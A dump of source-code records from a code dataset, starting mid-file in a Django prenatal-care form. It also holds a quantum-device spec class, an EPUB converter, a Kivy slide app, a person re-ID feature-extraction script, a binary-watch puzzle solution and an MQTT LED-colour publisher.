self.fields['rapida_hemoglobina_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_1_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_2_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_3_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_4_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_5_resultado'].widget.attrs = atributos\n self.fields['hemoglobina_alta_resultado'].widget.attrs = atributos\n\n for key in self.fields:\n field = self.fields[key]\n if field.label.lower() == 'fecha':\n field.widget.attrs['class'] = 'input-datepicker'\n\n def clean_rapida_sifilis_fecha(self):\n sifilis = self.cleaned_data['rapida_sifilis']\n fecha = self.cleaned_data['rapida_sifilis_fecha']\n\n '''if sifilis=='reactivo' or sifilis=='no reactivo':\n if fecha:\n return fecha\n else:\n raise forms.ValidationError(\n u'Ingrese la fecha')\n\n return fecha'''\n return self.validacion_fecha(sifilis, fecha)\n\n def clean_rapida_sifilis_2_fecha(self):\n sifilis = self.cleaned_data['rapida_sifilis_2']\n fecha = self.cleaned_data['rapida_sifilis_2_fecha']\n\n return self.validacion_fecha(sifilis, fecha)\n\n def clean_rapida_vih_1_fecha(self):\n vih = self.cleaned_data['rapida_vih_1']\n fecha = self.cleaned_data['rapida_vih_1_fecha']\n\n return self.validacion_fecha(vih, fecha)\n\n def clean_rapida_vih_2_fecha(self):\n vih = self.cleaned_data['rapida_vih_2']\n fecha = self.cleaned_data['rapida_vih_2_fecha']\n\n return self.validacion_fecha(vih, fecha)\n\n def validacion_fecha(self, campo, fecha):\n\n if campo == 'reactivo' or campo == 'no reactivo':\n if fecha:\n return fecha\n else:\n raise forms.ValidationError(\n u'Ingrese la fecha')\n\n return fecha\n\n\nclass DiagnosticoForm(forms.ModelForm):\n eg_elegida = forms.ChoiceField(\n label=u'Edad gestacional elegida', choices=Control.EG_CHOICES)\n\n class Meta:\n model = Diagnostico\n exclude = ('paciente', 'control')\n\n def __init__(self, *args, **kwargs):\n\n establecimiento_id = kwargs.pop('establecimiento_id')\n establecimiento_actual = Establecimiento.objects.get(id=establecimiento_id)\n super(DiagnosticoForm, self).__init__(*args, **kwargs)\n if self.instance.id:\n self.fields[\n 'eg_elegida'].initial = self.instance.control.eg_elegida\n\n if establecimiento_actual.is_sistema_externo_admision:\n self.fields['proxima_cita'].widget = forms.HiddenInput()\n self.fields['proxima_cita'].required = False\n\nclass ExamenFetalForm(forms.ModelForm):\n class Meta:\n model = ExamenFisicoFetal\n exclude = ('control','situacion','presentacion', 'posicion', 'movimientos_fetales')\n\nExamenFetalFormSet = inlineformset_factory(\n Ingreso,\n ExamenFisicoFetal,\n form=ExamenFetalForm,\n min_num=1,\n max_num=12,\n extra=0\n )\n\nExamenFetalMedicionFormSet = inlineformset_factory(\n PartogramaMedicion,\n ExamenFisicoFetal,\n form=ExamenFetalForm,\n min_num=1,\n max_num=12,\n extra=0\n )\n","sub_path":"apps/controles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":21975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"73023228","text":"# Copyright 2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis module contains a class that represents the specifications of\na device available via the API.\n\"\"\"\nfrom collections.abc import Sequence\nimport re\n\nimport blackbird\nfrom blackbird.error import BlackbirdSyntaxError\n\nimport strawberryfields as sf\nfrom strawberryfields.compilers import Ranges\n\n\nclass DeviceSpec:\n \"\"\"The specifications for a specific hardware device.\n\n Args:\n target (str): name of the target hardware device\n spec (dict): dictionary representing the raw device specification.\n This dictionary should contain the following key-value pairs:\n\n - layout (str): string containing the Blackbird circuit layout\n - modes (int): number of modes supported by the target\n - compiler (list): list of supported compilers\n - gate_parameters (dict): parameters for the circuit gates\n\n connection (strawberryfields.api.Connection): connection over which the\n job is managed\n \"\"\"\n\n def __init__(self, target, spec, connection):\n self._target = target\n self._connection = connection\n self._spec = spec\n\n @property\n def target(self):\n \"\"\"str: The name of the target hardware device.\"\"\"\n return self._target\n\n @property\n def layout(self):\n \"\"\"str: Returns a string containing the Blackbird circuit layout.\"\"\"\n return self._spec[\"layout\"]\n\n @property\n def modes(self):\n \"\"\"int: Number of modes supported by the device.\"\"\"\n return self._spec[\"modes\"]\n\n @property\n def compiler(self):\n \"\"\"list[str]: A list of strings corresponding to Strawberry Fields compilers supported\n by the hardware device.\"\"\"\n return self._spec[\"compiler\"]\n\n @property\n def default_compiler(self):\n \"\"\"sf.compilers.Compiler: Specified default compiler\"\"\"\n if self.compiler:\n return self.compiler[0]\n\n # For now, use Xunitary compiler by default for devices\n # if the default compiler is not specified.\n return \"Xunitary\"\n\n @property\n def gate_parameters(self):\n \"\"\"dict[str, strawberryfields.compilers.Ranges]: A dictionary of gate parameters\n and allowed ranges.\n\n The parameter names correspond to those present in the Blackbird circuit layout.\n\n **Example**\n\n >>> spec.gate_parameters\n {'squeezing_amplitude_0': x=0, x=1, 'phase_0': x=0, 0≤x≤6.283185307179586}\n \"\"\"\n gate_parameters = dict()\n\n for gate_name, param_ranges in self._spec[\"gate_parameters\"].items():\n # convert gate parameter allowed ranges to Range objects\n range_list = [[i] if not isinstance(i, Sequence) else i for i in param_ranges]\n gate_parameters[gate_name] = Ranges(*range_list)\n\n return gate_parameters\n\n def layout_is_formatted(self):\n \"\"\"bool: Whether the device layout is formatted or not.\"\"\"\n p = re.compile(r\"{{\\w*}}\")\n return not bool(p.search(self.layout))\n\n def fill_template(self, program):\n \"\"\"Fill template with parameter values from a program\"\"\"\n if self.layout_is_formatted():\n return\n\n if program.type == \"tdm\":\n self._spec[\"layout\"] = self._spec[\"layout\"].format(\n target=self.target, tm=program.timebins\n )\n else:\n # TODO: update when `self._spec[\"layout\"]` is returned as an unformatted string\n raise NotImplementedError(\"Formatting not required or supported for non-TDM programs.\")\n\n def validate_parameters(self, **parameters):\n \"\"\"Validate gate parameters against the device spec.\n\n Gate parameters should be passed as keyword arguments, with names\n corresponding to those present in the Blackbird circuit layout.\n \"\"\"\n # check that all provided parameters are valid\n for p, v in parameters.items():\n if p in self.gate_parameters and v not in self.gate_parameters[p]:\n # parameter is present in the device specifications\n # but the user has provided an invalid value\n raise ValueError(\n f\"{p} has invalid value {v}. Only {self.gate_parameters[p]} allowed.\"\n )\n\n if p not in self.gate_parameters:\n raise ValueError(f\"Parameter {p} not a valid parameter for this device\")\n\n def create_program(self, **parameters):\n \"\"\"Create a Strawberry Fields program matching the low-level layout of the\n device.\n\n Gate arguments should be passed as keyword arguments, with names\n correspond to those present in the Blackbird circuit layout. Parameters not\n present will be assumed to have a value of 0.\n\n **Example**\n\n Device specifications can be retrieved from the API by using the\n :class:`~.Connection` class:\n\n >>> spec.create_program(squeezing_amplitude_0=0.43)\n \n\n Keyword Args:\n Supported parameter values for the specific device\n\n Returns:\n strawberryfields.program.Program: program compiled to the device\n \"\"\"\n try:\n bb = blackbird.loads(self.layout)\n except BlackbirdSyntaxError as e:\n raise BlackbirdSyntaxError(\"Layout is not formatted correctly.\") from e\n self.validate_parameters(**parameters)\n\n # determine parameter value if not provided\n extra_params = set(self.gate_parameters) - set(parameters)\n\n for p in extra_params:\n # Set parameter value as the first allowed\n # value in the gate parameters dictionary.\n parameters[p] = self.gate_parameters[p].ranges[0].x\n\n # evaluate the blackbird template\n bb = bb(**parameters)\n prog = sf.io.to_program(bb)\n prog._compile_info = (self, self.default_compiler)\n return prog\n\n def refresh(self):\n \"\"\"Refreshes the device specifications\"\"\"\n self._spec = self._connection._get_device_dict(self.target)\n","sub_path":"strawberryfields/api/devicespec.py","file_name":"devicespec.py","file_ext":"py","file_size_in_byte":6684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"381286486","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n\nimport argparse\nimport logging\nimport os\nimport subprocess\nimport sys\nimport uuid\n\nfrom ebooklib import epub\nfrom openpyxl import load_workbook\n\nfrom readers import find_reader\n\nversion_info = '0.1a0'\n\nUPLOAD_PATH = '/www/wwwroot/www.yancloud.red/Uploads/bookTemp'\n\n\ndef upload_file(filename):\n cmdlist = ['ftp']\n cmdlist.append(filename)\n p = subprocess(cmdlist,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n output, _ = p.communicate()\n\n\ndef save_result(filelist, result, filename=None):\n if filename is None:\n filename = 'upload-epub.xlsx'\n template = os.path.join(os.path.dirname(__file__), 'upload.xltx')\n wb = load_workbook(template)\n wb.template = False\n\n start_row = 3\n filename_col = 'A'\n author_col = 'D'\n author_info_col = 'E'\n isbn_col = 'F'\n date_col = 'G'\n publisher_col = 'H'\n price_col = 'I'\n intro_col = 'J'\n path_col = 'K'\n\n def format_author(a):\n return ','.join(a.split())\n\n def format_date(a):\n for t in ('年', '月', '日', '/'):\n a = a.replace(t, '-')\n s = [x.strip() for x in a.split('-') if x.strip()]\n if len(s) == 2:\n s.append('1')\n return '-'.join(s)\n\n ws = wb.active\n row = start_row\n for name, meta in zip(filelist, result):\n rs = str(row)\n name = os.path.basename(name).rsplit('.', 1)[0]\n ws[filename_col + rs] = meta.get('title', name)\n ws[author_col + rs] = format_author(meta.get('author', ''))\n ws[author_info_col + rs] = meta.get('author_info')\n ws[isbn_col + rs] = meta.get('ISBN')\n ws[date_col + rs] = format_date(meta.get('date', ''))\n ws[publisher_col + rs] = meta.get('publisher')\n ws[price_col + rs] = meta.get('price')\n ws[intro_col + rs] = meta.get('intro')\n ws[path_col + rs] = name + '.epub'\n row += 1\n\n wb.save(filename)\n wb.close()\n\n return filename\n\n\ndef process_file(filename, output='output'):\n logging.info('Processing %s...', filename)\n reader = find_reader(filename)\n if reader is None:\n raise Exception('不支持的文件类型')\n\n reader.open(filename)\n\n book = epub.EpubBook()\n book.FOLDER_NAME = 'OEBPS'\n\n style = '''body { qrfullpage:1; text-align:center; }\n img { max-width: 80% }'''\n cover_css = epub.EpubItem(uid=\"style_cover\",\n file_name=\"cover.css\",\n media_type=\"text/css\",\n content=style)\n book.add_item(cover_css)\n\n path = os.path.dirname(__file__)\n with open(os.path.join(path, 'templates', 'default.css')) as f:\n default_css = epub.EpubItem(uid=\"style_default\",\n file_name=\"../Styles/default.css\",\n media_type=\"text/css\",\n content=f.read())\n book.add_item(default_css)\n\n meta = reader.get_metadata()\n book.set_identifier(meta.get('ISBN', str(uuid.uuid4())))\n\n name = os.path.splitext(os.path.basename(filename))[0]\n book.set_title(meta.get('title', name))\n book.set_language('zh')\n\n author = meta.get('author')\n if author:\n book.add_author(author)\n\n cover = reader.get_cover()\n if cover:\n book.set_cover('Images/coverpage.jpg', open(cover, 'rb').read())\n book.get_item_with_id('cover').add_item(cover_css)\n book.toc = [epub.Link('cover.xhtml', '封面', 'cover')]\n else:\n book.toc = []\n\n css_items = []\n for item in reader.stylesheets():\n book.add_item(item)\n css_items.append(item)\n\n for item in reader.contents():\n if isinstance(item, epub.EpubHtml):\n item.add_item(default_css)\n for css in css_items:\n item.add_item(css)\n book.add_item(item)\n\n for item in reader.images():\n book.add_item(item)\n\n # sec = None\n # for item in reader.get_toc():\n # n, p = item\n # if isinstance(p, str):\n # if sec is not None:\n # book.toc.append(sec)\n # s = epub.Section(p)\n # sec = s, []\n # else:\n # if sec[0].href == '':\n # sec[0].href = p.get_name()\n # sec[1].append(p)\n # if sec is not None:\n # book.toc.append(sec)\n\n toc = reader.get_toc()\n if toc is None:\n raise Exception('不正确的章节结构')\n book.toc.extend(toc)\n\n reader.close()\n\n book.add_item(epub.EpubNcx())\n book.add_item(epub.EpubNav())\n\n book.spine = ['cover', 'nav']\n book.spine.extend(list(book.get_items_of_type(9))[1:-1])\n\n if not os.path.exists(output):\n os.makedirs(output)\n epub.write_epub(os.path.join(output, name + '.epub'), book)\n return meta\n\n\ndef main(args):\n parser = argparse.ArgumentParser(\n prog='mkepub',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='Make epub from pdf or text file',\n )\n parser.add_argument('-v', '--version', action='version',\n version=version_info)\n parser.add_argument('-q', '--silent', action='store_true',\n help='Suppress all normal output')\n\n parser.add_argument('-O', '--output', default='output', metavar='PATH')\n parser.add_argument('-c', '--cover', metavar='IMAGE',\n help='Filename of cover image]')\n parser.add_argument('-t', '--template', metavar='PATH',\n help='Template path')\n parser.add_argument('filenames', nargs='+', help='Source filenames')\n\n args = parser.parse_args(args)\n if args.silent:\n logging.getLogger().setLevel(100)\n\n for filename in args.filenames:\n process_file(filename, args.output)\n\n\ndef main_entry():\n logging.basicConfig(\n level=logging.INFO,\n format='%(levelname)-8s %(message)s',\n )\n try:\n main(sys.argv[1:])\n except Exception as e:\n if sys.flags.debug:\n raise\n logging.error('%s', e)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main_entry()\n # main(['test/examples/解读延安精神.txt'])\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"485337120","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.metrics import sp\nfrom kivy.properties import NumericProperty\nfrom kivy.properties import ObjectProperty\nfrom kivy.properties import StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivy.uix.screenmanager import SlideTransition\nimport os\n\n# Create both screens. Please note the root.manager.current: this is how\n# you can control the ScreenManager from kv. Each screen has by default a\n# property manager that gives you the instance of the ScreenManager used.\n\n# Declare both screens\n\n\n__version__ = '1.0.0'\n\nslides = [\"Register\", \"Welcome\", \"Login\"]\nfor slide in slides:\n kv_file = \"{}.kv\".format(slide.lower())\n Builder.load_file(os.path.join(\"slides\", kv_file))\n\n\nclass RegisterScreen(Screen):\n pass\n\n\nclass WelcomeScreen(Screen):\n pass\n\n\nclass LoginScreen(Screen):\n pass\n\n\nclass veni(BoxLayout):\n def __init__(self, **kwargs):\n super(veni, self).__init__(**kwargs)\n self.orientation = 'vertical'\n self.content = ScreenManager()\n self.content.add_widget(RegisterScreen(name='Register'))\n self.content.add_widget(WelcomeScreen(name='Welcome'))\n self.content.add_widget(LoginScreen(name=\"Login\"))\n self.content.current = 'Welcome'\n self.add_widget(self.content)\n self.slide_menu = SlideMenu(root=self)\n self.add_widget(self.slide_menu)\n\n def get_current_slide(self):\n return self.content.current\n\n def set_current_slide(self, jump_to):\n if slides.index(jump_to) >= slides.index(self.get_current_slide()):\n self.set_transition('left')\n else:\n self.set_transition('right')\n self.content.current = jump_to\n self.slide_menu.ids.slide_spinner.text = \"\"\n\n def set_transition(self, direction):\n self.content.transition = SlideTransition(direction=direction)\n\n\nBuilder.load_file(\"slidemenu.kv\")\n\n\nclass SlideMenu(BoxLayout):\n slide_spinner = ObjectProperty(None)\n\n def __init__(self, root, **kwargs):\n super(SlideMenu, self).__init__(**kwargs)\n self.root = root\n self.slide_spinner.values = slides\n\n def go_slide(self, spinner):\n if spinner.text in slides:\n self.root.set_current_slide(spinner.text)\n\n def go_prev(self):\n cur_index = slides.index(self.root.get_current_slide())\n prev_index = cur_index if cur_index == 0 else cur_index-1\n self.root.set_current_slide(slides[prev_index])\n\n def go_next(self):\n cur_index = slides.index(self.root.get_current_slide())\n next_index = cur_index if cur_index == len(slides)-1 else cur_index+1\n self.root.set_current_slide(slides[next_index])\n\n\nclass veniApp(App):\n font_size_regular = sp(20)\n font_size_large = font_size_regular * 2\n font_size_xlarge = font_size_regular * 3\n\n def build(self):\n return veni()\n\nif __name__ == '__main__':\n veniApp().run()","sub_path":"src/veniApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"555462548","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, division\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport torch.backends.cudnn as cudnn\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport time\nimport os\nimport scipy.io\nimport yaml\nimport math\nfrom model import ft_net\n\n######################################################################\n# Options\n# --------\n\nparser = argparse.ArgumentParser(description='Training')\nparser.add_argument('--gpu_ids', default='5', type=str, help='gpu_ids: e.g. 0 0,1,2 0,2')\nparser.add_argument('--which_epoch', default='last', type=str, help='0,1,2,3...or last')\nparser.add_argument('--test_dir',\n default='/data2/wangshengkang/ingenious/a/skillful/reiddatasets/Market-1501-v15.09.15/pytorch',\n type=str,\n help='./test_data')\nparser.add_argument('--name', default='ft_ResNet50', type=str, help='save model path')\nparser.add_argument('--batchsize', default=256, type=int, help='batchsize')\nparser.add_argument('--multi', action='store_true', help='use multiple query')\nparser.add_argument('--ms', default='1', type=str, help='multiple_scale: e.g. 1 1,1.1 1,1.1,1.2')\n# 使用parse_args()解析添加的参数\nopt = parser.parse_args()\n###load config###\n# load the training config\nconfig_path = os.path.join('./model', opt.name, 'opts.yaml')\nwith open(config_path, 'r') as stream:\n config = yaml.load(stream)\n\nopt.stride = config['stride']\n\nif 'nclasses' in config: # tp compatible with old config files\n opt.nclasses = config['nclasses']\nelse:\n opt.nclasses = 751\n\nstr_ids = opt.gpu_ids.split(',') # 将gpu字符串分开\n# which_epoch = opt.which_epoch\nname = opt.name # 模型名字\ntest_dir = opt.test_dir # 测试集地址\n\ngpu_ids = [] # 创建gpu列表\nfor str_id in str_ids:\n id = int(str_id) # 将str转为int\n if id >= 0:\n gpu_ids.append(id) # 将可用gpu加入gpu列表\n\nprint('We use the scale: %s' % opt.ms) # 将使用的图片尺度打印出来\nstr_ms = opt.ms.split(',') # 将多尺度参数通过逗号分开\nms = [] # 创建多尺度的列表\nfor s in str_ms:\n s_f = float(s) # 将str参数变为float\n ms.append(math.sqrt(s_f)) # sqrt()算平方根\n\n# set gpu ids\nif len(gpu_ids) > 0: # 如果有gpu\n torch.cuda.set_device(gpu_ids[0]) # 设置用哪块gpu,只用第一块就够了\n '''\n 总的来说,大部分情况下,设置这个 flag 可以让内置的 cuDNN 的 auto-tuner 自动寻找最适合当前配置的高效算法,来达到优化运行效率的问题。\n 一般来讲,应该遵循以下准则:\n 如果网络的输入数据维度或类型上变化不大,设置 torch.backends.cudnn.benchmark = true 可以增加运行效率;\n 如果网络的输入数据在每次 iteration 都变化的话,会导致 cnDNN 每次都会去寻找一遍最优配置,这样反而会降低运行效率。 \n '''\n cudnn.benchmark = True\n\n######################################################################\n# Load Data\n# ---------\n#\n# We will use torchvision and torch.utils.data packages for loading the\n# data.\n#\ndata_transforms = transforms.Compose([\n transforms.Resize((256, 128), interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\ndata_dir = test_dir # 数据集地址\nif data_dir == 'market':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/Market-1501-v15.09.15/pytorch'\nelif data_dir == 'duke':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/DukeMTMC-reID/pytorch'\nelif data_dir == 'msmt':\n data_dir = '/data2/wangshengkang/ingenious/a/skillful/reiddatasets/MSMT17/pytorch'\n\n# 数据集弄成dataloader的形式\nimage_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms) for x in ['gallery', 'query']}\ndataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=opt.batchsize,\n shuffle=False, num_workers=16) for x in ['gallery', 'query']}\nclass_names = image_datasets['query'].classes # 行人ID的数量\nuse_gpu = torch.cuda.is_available() # 是否有gpu\n\n\n######################################################################\n# Load model\n# ---------------------------\ndef load_network(network):\n save_path = os.path.join('./model', name, 'net_%s.pth' % opt.which_epoch) # 保存模型的路径\n network.load_state_dict(torch.load(save_path)) # 保存模型\n return network\n\n\n######################################################################\n# Extract feature\n# ----------------------\n#\n# Extract feature from a trained model.\n#\ndef fliplr(img):\n '''flip horizontal'''\n # arange\n # torch.range(start=1, end=6) 的结果是会包含end的,\n # 而torch.arange(start=1, end=6)的结果并不包含end。\n # 两者创建的tensor的类型也不一样。\n #将W维度的数据位置倒过来\n inv_idx = torch.arange(img.size(3) - 1, -1, -1).long() # N x C x H x W\n '''\n Returns a new tensor which indexes the input tensor along dimension dim using the\n entries in index which is a LongTensor.\n The returned tensor has the same number of dimensions as the original tensor (input).\n The dimth dimension has the same size as the length of index; other dimensions\n have the same size as in the original tensor.\n 参数:\n dim:表示从第几维挑选数据,类型为int值;\n index:表示从第一个参数维度中的哪个位置挑选数据,类型为torch.Tensor类的实例;\n '''\n #将W维度的数���按照倒过来的索引读取,这样就实现了图片翻转\n img_flip = img.index_select(3, inv_idx)\n return img_flip\n\n\n# 提取特征\ndef extract_feature(model, dataloaders):\n features = torch.FloatTensor() # 创建一个tensor\n count = 0 # 目前所有batch的图片数量初始化\n for data in dataloaders:\n img, label = data # 图片和标签\n n, c, h, w = img.size() # 图片的N,C,H,W\n count += n # 将每个batch的图片数量加起来\n print(count) # 打印目前所有batch的图片数量\n ff = torch.FloatTensor(n, 512).zero_().cuda() # 创建一个大小为n*512的0矩阵\n\n for i in range(2):#用原始图片和翻转图片,来获得更稳定的特征\n if (i == 1):\n img = fliplr(img)#将图片翻转\n input_img = Variable(img.cuda()) # 放到gpu里面,并且用varibale包装\n for scale in ms:\n if scale != 1: # 如果使用多尺度的话\n # bicubic is only available in pytorch>= 1.1\n # 根据给定的size或scale_factor参数来对输入进行下/上采样使用的插值算法取决于参数mode的设置\n # 参数:\n # input (Tensor) – 输入张量\n # size (int or Tuple[int] or Tuple[int, int] or Tuple[int, int, int]) –输出大小.\n # scale_factor (float or Tuple[float]) – 指定输出为输入的多少倍数。如果输入为tuple,其也要制定为tuple类型\n # mode (str) – 可使用的上采样算法,有'nearest', 'linear', 'bilinear', 'bicubic' , 'trilinear'和'area'. 默认使用'nearest'\n # align_corners (bool, optional) –几何上,我们认为输入和输出的像素是正方形,而不是点。\n # 如果设置为True,则输入和输出张量由其角像素的中心点对齐,从而保留角像素处的值。\n # 如果设置为False,则输入和输出张量由它们的角像素的角点对齐,插值使用边界外值的边值填充;\n # 当scale_factor保持不变时,使该操作独立于输入大小。仅当使用的算法为'linear', 'bilinear',\n # 'bilinear'or 'trilinear'时可以使用。默认设置为False\n input_img = nn.functional.interpolate(input_img, scale_factor=scale, mode='bicubic',\n align_corners=False)\n outputs = model(input_img) # 如果没用多尺度\n ff += outputs\n # norm feature\n '''\n 返回所给tensor的矩阵范数或向量范数\n 参数:\n input:输入tensor\n p (int, float, inf, -inf, 'fro', 'nuc', optional):范数计算中的幂指数值。默认为'fro'\n dim (int,2-tuple,2-list, optional): 指定计算的维度。如果是一个整数值,向量范数将被计算;如果是一个大小为2的元组,矩阵范数将被计算;如果为None,当输入tensor只有两维时矩阵计算矩阵范数;当输入只有一维时则计算向量范数。如果输入tensor超过2维,向量范数将被应用在最后一维\n keepdim(bool,optional):指明输出tensor的维度dim是否保留。如果dim=None或out=None,则忽略该参数。默认值为False,不保留\n out(Tensor, optional):tensor的输出。如果dim=None或out=None,则忽略该参数。\n dtype(torch.dtype,optional):指定返回tensor的期望数据类型。如果指定了该参数,在执行该操作时输入tensor将被转换成 :attr:’dtype’\n '''\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)# L2-norm p取2计算的是2-范数,也就是距离\n '''\n expand_as(other) → Tensor\n Expand this tensor to the same size as other. self.expand_as(other) is equivalent to self.expand(other.size()).\n Please see expand() for more information about expand.\n Parameters\n other (torch.Tensor) – The result tensor has the same size as other.\n torch.div()\n out=input/other\n torch.div(input, other, out=None) → Tensor\n Divides each element of the input input with the scalar other and returns a new resulting tensor.\n '''\n ff = ff.div(fnorm.expand_as(ff))\n #竖着拼接在一起\n features = torch.cat((features, ff.data.cpu()), 0)\n return features\n\n\ndef get_id(img_path):\n camera_id = []#摄像机id的列表\n labels = []#标签的列表\n for path, v in img_path:\n # filename = path.split('/')[-1]\n filename = os.path.basename(path)#返回文件名\n label = filename[0:4]#标签为文件名的前四位,也就是前四位数字作文标签\n #将字符串从c分开,取后面那部分\n camera = filename.split('c')[1]\n # -1 表示检测出来其他人的图���不在这 750 人中)\n if label[0:2] == '-1':\n labels.append(-1)\n else:\n labels.append(int(label))\n camera_id.append(int(camera[0]))#将前面分离出来的字符串第一个字符取出作为摄像头的标签\n return camera_id, labels\n\n\ngallery_path = image_datasets['gallery'].imgs # gallery数据集\nquery_path = image_datasets['query'].imgs # query数据集\n\ngallery_cam, gallery_label = get_id(gallery_path) # 获取gallery的id\nquery_cam, query_label = get_id(query_path) # 获取query的id\n\n######################################################################\n# Load Collected data Trained model\nprint('-------test-----------')\n\n# 调用模型,resnet\nmodel_structure = ft_net(opt.nclasses, stride=opt.stride)\n\n# 加载模型参数\nmodel = load_network(model_structure)\n\n# Remove the final fc layer and classifier layer\n# 讲模型最后的分类层去掉\nmodel.classifier.classifier = nn.Sequential()\n\n# Change to test mode\nmodel = model.eval()\nif use_gpu:\n model = model.cuda() # 如果有gpu,模型放到gpu里面\n\n# Extract feature\n# 用于停止autograd模块的工作,以起到加速和节省显存的作用,具体行为就是\n# 停止gradient计算,从而节省了GPU算力和显存,但是并不会影响dropout和batchnorm\n# 层的行为。\nwith torch.no_grad():\n # 提取gallery特征\n gallery_feature = extract_feature(model, dataloaders['gallery'])\n # 提取query特征\n query_feature = extract_feature(model, dataloaders['query'])\n\n# Save to Matlab for check\nresult = {'gallery_f': gallery_feature.numpy(), 'gallery_label': gallery_label, 'gallery_cam': gallery_cam,\n 'query_f': query_feature.numpy(), 'query_label': query_label, 'query_cam': query_cam}\nscipy.io.savemat('pytorch_result.mat', result)\n\nprint(opt.name) # 打印此时运行程序的名字\nresult = './model/%s/result.txt' % opt.name\n# | 表示管道,上一条命令的输出,作为下一条命令参数\n# Linux tee命令用于读取标准输入的数据,并将其内容输出成文件。\n# tee指令会从标准输入设备读取数据,将其内容输出到标准输出设备,同时保存成文件。\n# -a或--append  附加到既有文件的后面,而非覆盖它。\nos.system('python evaluate_gpu.py | tee -a %s' % result) # 将运行结果存放到result里面\n","sub_path":"project/ReidBaseline/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"547597384","text":"# coding=utf-8\n\n\"\"\"Binary Watch.\"\"\"\n\nfrom __future__ import print_function\n\n\n# 可以直接检测 12, 60 个数中的 1 的数量而无需计算置换\ndef _solve(num):\n def _get_all_possibility(bit, total_bit):\n result = []\n\n def _deep(bit, total_bit, cur):\n if len(cur) == total_bit:\n if bit == 0:\n result.append(cur)\n elif bit == 0:\n _deep(bit, total_bit, cur + '0')\n else:\n _deep(bit, total_bit, cur + '0')\n _deep(bit - 1, total_bit, cur + '1')\n\n _deep(bit, total_bit, '')\n return [int(bin_str, 2) for bin_str in result]\n\n def _get_all_hour(bit):\n return [str(pro) for pro in _get_all_possibility(bit, 4) if pro < 12]\n\n def _get_all_minute(bit):\n mins = [('0' if pro < 10 else '') + str(pro)\n for pro in _get_all_possibility(bit, 6) if pro < 60]\n return mins\n\n ans = []\n for hour_bit in range(0, min(5, num + 1)):\n for hour in _get_all_hour(hour_bit):\n for minute in _get_all_minute(num - hour_bit):\n ans.append(hour + ':' + minute)\n return ans\n\n\nif __name__ == '__main__':\n print (_solve(1))\n","sub_path":"easy/401.py","file_name":"401.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"513278702","text":"# zender van ons packet\r\n\r\nimport paho.mqtt.client as mqtt # import the client1\r\nimport time\r\n\r\n# use external broker\r\nbroker_address = \"192.168.0.150\"\r\nbroker_port = 1883\r\n# create new instance\r\nclient = mqtt.Client(\"AI\")\r\n# connect to broker\r\nclient.connect(broker_address, broker_port)\r\n\r\n\r\n# topic = ID (x,y)\r\nx = 0\r\ny = 1\r\n\r\n# message, dit worden in de toekomst ingevuld door de variabelen van de JSON-file\r\nmode = 2\r\nfreq = 25.000 # in Hz\r\nR1 = 255\r\nG1 = 65\r\nB1 = 38\r\nW1 = 0\r\nR2 = 44\r\nG2 = 0\r\nB2 = 120\r\nW2 = 33\r\nR3 = 0\r\nG3 = 25\r\nB3 = 255\r\nW3 = 0\r\nhoekAlpha = 20\r\nhoekTheta = 170\r\n\r\nID = 1\r\nRGB1 =\"255,255,0,0\"\r\nRGB2 = \"255,0,0,0\"\r\nRGB3 = \"0,0,255,0\"\r\n\r\n# publish the message\r\nwhile True:\r\n client.publish(\"AI\", \"%u;%s;%s;%s\" % ( ID,RGB1,RGB2,RGB3))\r\n #client.publish(\"%u,%u\" % (x, y), \"{%u,%f,[%u,%u,%u,%u],[%u,%u,%u,%u],[%u,%u,%u,%u],[%u,%u]}\" % ( mode, freq, R1, G1, B1, W1, R2, G2, B2, W2, R3, G3, B3, W3, hoekAlpha, hoekTheta))\r\n print(\"MQTT-publisher heeft zijn bericht succesvol verstuurt\")\r\n time.sleep(1)","sub_path":"pythonscriptCode/Code voor 1 